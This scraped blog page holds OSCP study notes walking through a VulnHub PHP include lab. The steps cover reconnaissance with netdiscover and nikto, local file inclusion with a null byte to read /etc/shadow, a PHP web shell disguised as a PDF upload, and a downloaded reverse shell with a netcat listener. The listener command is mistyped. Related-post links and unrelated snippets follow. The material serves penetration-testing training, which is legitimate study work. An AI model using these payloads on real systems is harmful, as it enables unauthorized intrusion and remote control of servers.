Local File Inclusion[LFI]

Target Pentester Lab: Download from the following website:

https://www.vulnhub.com/entry/pentester-lab-php-include-and-post-exploitation,79/

1. Use netdiscover to find the IP of the target server.  The IP address of the target server is 10.0.0.22.

netdiscover

2. Click different buttons of the website, and watch the change of the URL.           page= XXXX

3. Scan the target website using the tool nikto.

nikto -h 10.0.0.22

4.Change the URL to "http://10.0.0.22/index.php?page=../../etc/shadow%00", and press enter.  We can find the following warning message.

5. Return to the submit page. Find that we can upload pdf files to the website.

6. Make a shell.pdf file and save it.

%PDF-1.4

<?php

      system($_GET["cmd"]);

?>

7. Upload the shell.pdf to target website.

8.Change the URL to the following type with shell commands.

http://10.0.0.22/index.php?page=uploads/shell.pdf%00&cmd=whoami

http://10.0.0.22/index.php?page=uploads/shell.pdf%00&cmd=pwd

9 Down load a web-shells from the following website.

http://pentestmonkey.net/tools/web-shells/php-reverse-shell

10.Modify the web-shell file. ①Add the PDF tag. ②Change the ip and port.

11.Copy the php shell file as shell2.pdf. And upload this file to the website.

cp php-reverse-shell.php shell2.pdf

12. Listening the port 4444 on Linux

nv -nvlp

13.Browse the following URL through Firefox.

http://10.0.0.22/index.php?page=uploads/shell2.pdf%00

14. Then we can use the shell command we like on the terminal.

OSCP Learning Notes - WebApp Exploitation(4)的更多相关文章

  1. OSCP Learning Notes - WebApp Exploitation(5)

    Remote File Inclusion[RFI] Prepare: Download the DVWA from the following website and deploy it on yo ...

  2. OSCP Learning Notes - WebApp Exploitation(3)

    SQL Injection[SQLi] Refrence: SQL Injection Authentication Bypass Cheat Sheet https://pentestlab.blo ...

  3. OSCP Learning Notes - WebApp Exploitation(2)

    Cross-Site Scripting(XSS) 1. Using the tool - netdiscover to find the IP of target server. netdiscov ...

  4. OSCP Learning Notes - WebApp Exploitation(1)

    Installing XSS&MySQL FILE Download the Pentester Lab: XSS and MySQL FILE from the following webs ...

  5. OSCP Learning Notes - Post Exploitation(2)

    Windows Post Exploitation Target Server: IE8-Win 7 VM 1. Download and upload the fgdump, PwDump7, wc ...

  6. OSCP Learning Notes - Post Exploitation(1)

    Linux Post Exploitation Target Sever: Kioptrix Level 1 1. Search the payloads types. msfvenom -l pay ...

  7. OSCP Learning Notes - Post Exploitation(4)

    Pivoting 1. Edit the virtual network settings of the Vmware. 2. Set the Network Adapter(s) of Kali L ...

  8. OSCP Learning Notes - Post Exploitation(3)

    Post-Exploit Password Attacks 1. Crack using the tool - john (Too slow in real world) Locate the roc ...

  9. OSCP Learning Notes - Overview

    Prerequisites: Knowledge of scripting languages(Bash/Pyhon) Understanding of basic networking concep ...

随机推荐

  1. PHP丨PHP基础知识之流程控制for循环「理论篇」

    今天公司同事在看for循环,那么我们今天就来讲讲for循环吧! for循环是编程语言中一种循环语句,而循环语句由循环体及循环的判定条件两部分组成,其表达式为:for(单次表达式;条件表达式;末尾循环体 ...

  2. LevelDB/Rocksdb 特性分析

    LevelDb是Google开源的嵌入式持久化KV 单机存储引擎.采用LSM(Log Structured Merge)tree的形式组织持久化存储的文件sstable.LSM会造成写放大.读放大的问 ...

  3. Error: Cannot find module 'webpack'

    运行 npm start 报错 Error: Cannot find module 'webpack' 安装了 npm install --save-dev webpack cnpm install ...

  4. 微信小程序点击保存图片到本地相册——踩坑

    在微信小程序中要保存图片到本地相册,需要获取相册权限. 总之整个功能实现下来需要如下几个小程序的API:wx.getSetting,wx.authorize,wx.openSetting,wx.dow ...

  5. docker 安装mysql:latest 问题

    背景 周末闲着没事,然后想着在虚拟机用docker装个mysql吧.然后就开始安装了. 正文 打开dockerhub.com,在输入框输入mysql,选择mysql第一个,进入后找到How to us ...

  6. 平时Chrome中用的一些插件

    一.chrome://extensions Adblock Plus Dark Reader 让网站黑色主题 Infinity 新标签页 一个比较流行的新标签页工具 GNOME Shell integ ...

  7. 如何查看class文件的jdk版本

    版权声明:本文为博主原创文章,转载请注明本文链接.文章内容如有错误望能指正,以免误导更多人. https://blog.csdn.net/gnail_oug/article/details/47145 ...

  8. 一张PDF了解JDK9 GC调优秘籍-附PDF下载

    目录 简介 Oracle中的文档 JDK9中JVM参数的变化 废弃的JVM选项 不推荐(Deprecated)的JVM选项 被删除的JVM参数 JDK9的新特性Application Class Da ...

  9. mysql主从搭建操作

    1.搭建说明准备工作:主从库已安装mysql软件以及xtracbackup备份工具.具体操作可参见mysql rpm安装文档. 介质 版本操作系统 Red Hat Enterprise Linux S ...

  10. C++ MFC 操作文件夹及属性(新建,删除[包含子文件[夹]],剪切,复制,重命名)

    源文件:http://pan.baidu.com/s/169HCL 运行mfc缺失的动态连接库:http://pan.baidu.com/s/17pGlT 截图: 不足之处仅供参考,哈哈.